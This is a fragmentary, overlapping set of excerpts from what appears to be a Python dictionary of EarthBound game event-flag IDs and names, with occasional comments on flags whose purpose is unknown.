Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS',", "681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687:", "'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM',", "625 (Something about \"Fancy Pokey\" in the Monotoli Building) -- Got kicked out", "778: 'EXIT_MOUSE_ASLEEP', # 779 (Related to PREVENT_TELEPORT?) # 780 (If set, Maxwell doesn't", "# 431 (???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another flag for", "526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529 (???) 530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS',", "'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP',", "'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) #", "240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246:", "'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP',", "# 286 (???) # 287 (Something about Lake Tess color palette) 288: 'USED_HAWK_EYE',", "'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN',", "253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259:", "text 104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN', # 106 (???) 
107: 'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED', 109:", "232 (I hate multipurpose flags) # 233 (I hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN',", "'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy Pokey\" in the Monotoli Building)", "multipurpose flags) # 228 (I hate multipurpose flags) # 229 (I hate multipurpose", "75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK', 81:", "'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED',", "'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED',", "582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', #", "'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS',", "'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH',", "'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR', # 302 (???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', #", "= { 1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4', 5: 'TEMP_5', 6:", "'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE', # 110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113:", "'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT',", "STONEHENGE??) # 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61:", "'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', #", "'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE',", "27: 'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33:", "'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY',", "570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 
573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP',", "(I hate multipurpose flags) # 230 (I hate multipurpose flags) # 231 (I", "347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353:", "flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES',", "223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I hate multipurpose flags) #", "'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO',", "'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', # 747 (??? Something about Runaway", "Bus?) 315: 'GHOSTS_BLOCKING_TWOSON', # 316 (Unknown. Something about the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED',", "49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', # 54 (Montague", "315: 'GHOSTS_BLOCKING_TWOSON', # 316 (Unknown. Something about the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318:", "radius of 16 pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350:", "Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???) # 321 (Something", "Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753:", "218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224:", "second Hieroglyph Guardian doesn't reference this flag and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED',", "Guardian doesn't reference this flag and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED',", "'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP',", "465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to Ness's house door knocking?)", "'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN',", "453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459:", "hate multipurpose flags) # 229 (I hate multipurpose flags) # 230 (I hate", "265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271:", "'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 
341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', #", "704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710:", "in the Monotoli Building) -- Got kicked out of Pokey's Room in the", "set even if you don't talk to Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY',", "616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn. Related to Stonehenge Base)", "686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692:", "381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', #", "multipurpose flags) # 230 (I hate multipurpose flags) # 231 (I hate multipurpose", "# 680 (Something about Venus show about to start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP',", "306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312:", "'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy Pokey\" in the", "'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA',", "1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4', 5: 'TEMP_5', 6: 'TEMP_6', 7:", "393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399:", "769 (Checked when you talk to Tracy after defeating Giygas, but never set)", "'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143:", "243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249:", "737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743:", "'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65", "no NPC attached to the script for this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED',", "466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to Ness's house door knocking?) 
468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470:", "the Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS',", "'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT',", "'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED',", "23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS', 29:", "'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY',", "'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS',", "kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT',", "358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364:", "268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274:", "Cleared when you defeat Mr. Carpainter) 176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179:", "'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to traffic jam?) #", "'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', # 156 (???) # 157 (???) # 158 (???) 159:", "doesn't actually save your game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831:", "338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY',", "about Runaway Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT',", "# 589 (Visibility flag for some Hotel Attendant?) 
590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', #", "580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586:", "56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62:", "579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585:", "'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED', # 282 (Five moles defeated? How", "Related to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611 (Something", "for some Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE',", "89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95:", "286 (???) # 287 (Something about Lake Tess color palette) 288: 'USED_HAWK_EYE', 289:", "'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP',", "192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', #", "649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655:", "from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', # 779 (Related to PREVENT_TELEPORT?)", "'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME',", "'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465 (???) 
466: 'PICKY_SLEEPING_AT_METEORITE', #", "'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED',", "acknowledging the kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER',", "632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638:", "'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE',", "410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416:", "606: 'DUNGEON_MAN_OPEN', # 607 (Unknown. Related to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED',", "267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273:", "'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 